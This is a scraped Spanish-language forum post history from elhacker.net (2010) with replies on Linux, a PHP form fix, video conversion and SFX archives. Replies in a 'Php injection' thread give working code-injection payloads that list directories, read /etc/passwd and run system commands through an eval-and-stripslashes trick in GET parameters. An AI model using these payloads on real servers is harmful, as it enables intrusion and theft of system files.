no, ahi no está el problema, debe estar en otra pagina.
puedes enviarme un zip por privado con esos archivos php para poder darles un vistazo?
puedes enviarme un zip por privado con esos archivos php para poder darles un vistazo?
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#3302
Noticias / Re: Errores comunes de los recién iniciados en GNU/Linux
24 Febrero 2010, 22:09 PM
yo tengo dos programas que son privativos y son diseñados para funcionar en windows.
En este caso utilizo la virtualbox pero nunca wine.
En este caso utilizo la virtualbox pero nunca wine.
#3303
PHP / Re: Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in C:\AppSe
24 Febrero 2010, 04:15 AM
haz esto:
Código (php) [Seleccionar]
<html>
<body>
<center>
<?php
function sql_esc($payload){
return str_replace(
array("\x08", "\t", '%', '_'),
array('\\b', '\\t', '\\%', '\\_'),
mysql_real_escape_string($payload)
);
}
$connect = mysql_connect("localhost","root", "")or die ("No fue posible efectuar la conexión...");
$db = mysql_select_db("expediente", $connect) or die ("No se pudo seccionar la base de datos...");
$c = $_REQUEST[codigo];
$result=mysql_query('select codigo from procesada where codigo='.sql_esc($c));
//Obtiene el registro correspondiente
if(mysql_fetch_array($result)){
?>
<font size=6 color=magenta>Modificación de datos de la planilla</font>
<FORM name=form1 method = post ACTION='http://localhost/Phpmyadmin/Registrar_Modificacion4.php'>
<TABLE border=2 bordercolor=blue cellpadding=10>
<CAPTION><font size=5>Introduzca los nuevos datos</font></CAPTION>
<TR>
<TD ALIGN=right>Código:</TD>
<TD>$c</TD><INPUT TYPE=HIDDEN NAME=oculto VALUE=$c>
</TR>
<TR>
<TD ALIGN=right>Guarderia:</TD>
<TD><INPUT TYPE=radio NAME='guarderias' SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right>Reembolso:</TD>
<TD><INPUT TYPE=radio NAME='reembolso' SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right>Carta Aval:</TD>
<TD><INPUT TYPE=radio NAME="cartaval" SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right>SRLS:</TD>
<TD><INPUT TYPE=radio NAME="srls" SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right>Cursos Realizados:</TD>
<TD><INPUT TYPE=radio NAME="curso" SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right>Cantidad:</TD>
<TD><INPUT TYPE=radio NAME="cantidad" SIZE="20"></TD>
</TR>
<TR>
<TD ALIGN=right VALIGN=top><font color="#000000" size="5">Fecha:</font></TD>
<TD>
<SELECT NAME="fecha">
<OPTION>Enero
<OPTION>Febrero
<OPTION>Marzo
<OPTION>Abril
<OPTION>Mayo
<OPTION>Junio
<OPTION>Julio
<OPTION>Agosto
<OPTION>Septiembre
<OPTION>Octubre
<OPTION>Diciembre
</SELECT>
</TD>
</TR>
</TABLE>
<BR><BR><BR>
<INPUT TYPE=submit VALUE='Registrar Modificación'>
</FORM>
<?php }else{ ?>
<BR><BR><font size=6>No existe un registro con este código</font>
<?php
}
mysql_close($connect);
?>
<center>
</body>
</html>
#3304
Nivel Web / Re: Php injection
24 Febrero 2010, 02:16 AM
mejor
print_r(glob('*'));
print_r(glob('/temp/*'));
print_r(glob('/*'));
print_r(glob('/etc/*'));
despues lees con file
print_r(file('/etc/passwd'));
print_r(glob('*'));
print_r(glob('/temp/*'));
print_r(glob('/*'));
print_r(glob('/etc/*'));
despues lees con file
print_r(file('/etc/passwd'));
#3305
Multimedia / Re: Convertir MOV a algo más pequeño
23 Febrero 2010, 22:41 PM
puedes pasarlo a mpeg, es lo mas similar en cuanto a calidad y mejor compresión, tambien puedes usar divix y codex no nativos pero es dificil enviar algo asi por email, tardarias dias en subir el video :p dependiendo la velocidad de conexión que tengas.
mejor mete todo en un dvd y le mandas el disco por correo o se lo llevas en persona, creeme que te ahorras muchos dolores de cabeza, o si no subelo a megavideo y webs similares que ofrecen servicio de subir videos sin perder calidad.
mejor mete todo en un dvd y le mandas el disco por correo o se lo llevas en persona, creeme que te ahorras muchos dolores de cabeza, o si no subelo a megavideo y webs similares que ofrecen servicio de subir videos sin perder calidad.
#3306
Nivel Web / Re: Php injection
23 Febrero 2010, 21:37 PM
ah en ese caso puedes hacer un
index.php?x=eval(stripslashses($_GET[z]));&z=echo 'x';exit;
de esta forma desde la variable x le das un nuevo eval y stripslashses y fijate que no ingresamos ninguna comilla, luego desde una segunda variable le inyectamos a todo dar
index.php?x=eval(stripslashses($_GET[z]));&z=echo 'x';exit;
de esta forma desde la variable x le das un nuevo eval y stripslashses y fijate que no ingresamos ninguna comilla, luego desde una segunda variable le inyectamos a todo dar
#3308
Nivel Web / Re: Php injection
23 Febrero 2010, 17:14 PM
nopo, esque de nada sirve ejecutar eval(stripslashses(system('ls -la'))) porque quedaría eval(stripslashses(system(\'ls -la\'))) , por eso debes ejecutarlo en la variable get:
y fijate que va sin comillas, ahora ejecutas index.php?x=system('ls -la'); exit;
Código [Seleccionar]
eval(stripslashses($_GET[x]))y fijate que va sin comillas, ahora ejecutas index.php?x=system('ls -la'); exit;
#3310
Hacking / Re: Archivos SFX
21 Febrero 2010, 23:46 PM
ponle
setup algo;
setup otra cosa;
setup etc.. ;
debes hacerlo manualmente si editando los comentarios de ejecución.
setup algo;
setup otra cosa;
setup etc.. ;
debes hacerlo manualmente si editando los comentarios de ejecución.